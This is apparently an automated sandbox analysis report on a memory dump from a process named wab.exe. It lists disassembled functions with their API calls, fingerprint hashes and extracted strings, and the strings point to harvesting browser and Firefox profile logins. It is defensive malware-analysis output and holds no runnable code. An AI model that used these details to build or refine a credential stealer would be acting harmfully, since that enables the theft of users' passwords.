                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • memset.MSVCRT ref: 0040265F
                    • memcpy.MSVCRT ref: 0040269B
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • memcpy.MSVCRT ref: 004026FF
                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                    • API String ID: 577499730-1134094380
                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                    • String ID: :stringdata$ftp://$http://$https://
                    • API String ID: 2787044678-1921111777
                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                    • GetWindowRect.USER32(?,?), ref: 00414088
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                    • GetDC.USER32 ref: 004140E3
                    • wcslen.MSVCRT ref: 00414123
                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                    • ReleaseDC.USER32(?,?), ref: 00414181
                    • _snwprintf.MSVCRT ref: 00414244
                    • SetWindowTextW.USER32(?,?), ref: 00414258
                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                    • GetClientRect.USER32(?,?), ref: 004142E1
                    • GetWindowRect.USER32(?,?), ref: 004142EB
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                    • GetClientRect.USER32(?,?), ref: 0041433B
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 2080319088-3046471546
                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                    Download Yara Rule
                    APIs
                    • EndDialog.USER32(?,?), ref: 00413221
                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                    • memset.MSVCRT ref: 00413292
                    • memset.MSVCRT ref: 004132B4
                    • memset.MSVCRT ref: 004132CD
                    • memset.MSVCRT ref: 004132E1
                    • memset.MSVCRT ref: 004132FB
                    • memset.MSVCRT ref: 00413310
                    • GetCurrentProcess.KERNEL32 ref: 00413318
                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                    • memset.MSVCRT ref: 004133C0
                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                    • memcpy.MSVCRT ref: 004133FC
                    • wcscpy.MSVCRT ref: 0041341F
                    • _snwprintf.MSVCRT ref: 0041348E
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                    • SetFocus.USER32(00000000), ref: 004134B7
                    Strings
                    • {Unknown}, xrefs: 004132A6
                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                    • API String ID: 4111938811-1819279800
                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                    • EndDialog.USER32(?,?), ref: 0040135E
                    • DeleteObject.GDI32(?), ref: 0040136A
                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                    • ShowWindow.USER32(00000000), ref: 00401398
                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                    • ShowWindow.USER32(00000000), ref: 004013A7
                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                    • String ID:
                    • API String ID: 829165378-0
                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00404172
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 004041D6
                    • wcscpy.MSVCRT ref: 004041E7
                    • memset.MSVCRT ref: 00404200
                    • memset.MSVCRT ref: 00404215
                    • _snwprintf.MSVCRT ref: 0040422F
                    • wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 0040426E
                    • memset.MSVCRT ref: 004042CD
                    • memset.MSVCRT ref: 004042E2
                    • _snwprintf.MSVCRT ref: 004042FE
                    • wcscpy.MSVCRT ref: 00404311
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                    • API String ID: 2454223109-1580313836
                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                    • SetMenu.USER32(?,00000000), ref: 00411453
                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                    • memcpy.MSVCRT ref: 004115C8
                    • ShowWindow.USER32(?,?), ref: 004115FE
                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                    • API String ID: 4054529287-3175352466
                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset$wcscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 3143752011-1996832678
                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                    Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                    • API String ID: 667068680-2887671607
                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemset$wcscpy$wcscat
                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                    • API String ID: 1607361635-601624466
                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf$memset$wcscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 2000436516-3842416460
                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1043902810-0
                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@_snwprintfwcscpy
                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                    • API String ID: 2899246560-1542517562
                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040DBCD
                    • memset.MSVCRT ref: 0040DBE9
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                    • wcscpy.MSVCRT ref: 0040DC2D
                    • wcscpy.MSVCRT ref: 0040DC3C
                    • wcscpy.MSVCRT ref: 0040DC4C
                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                    • wcscpy.MSVCRT ref: 0040DCC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                    • API String ID: 3330709923-517860148
                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040806A
                    • memset.MSVCRT ref: 0040807F
                    • _wtoi.MSVCRT ref: 004081AF
                    • _wcsicmp.MSVCRT ref: 004081C3
                    • memset.MSVCRT ref: 004081E4
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                    • String ID: logins$null
                    • API String ID: 3492182834-2163367763
                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
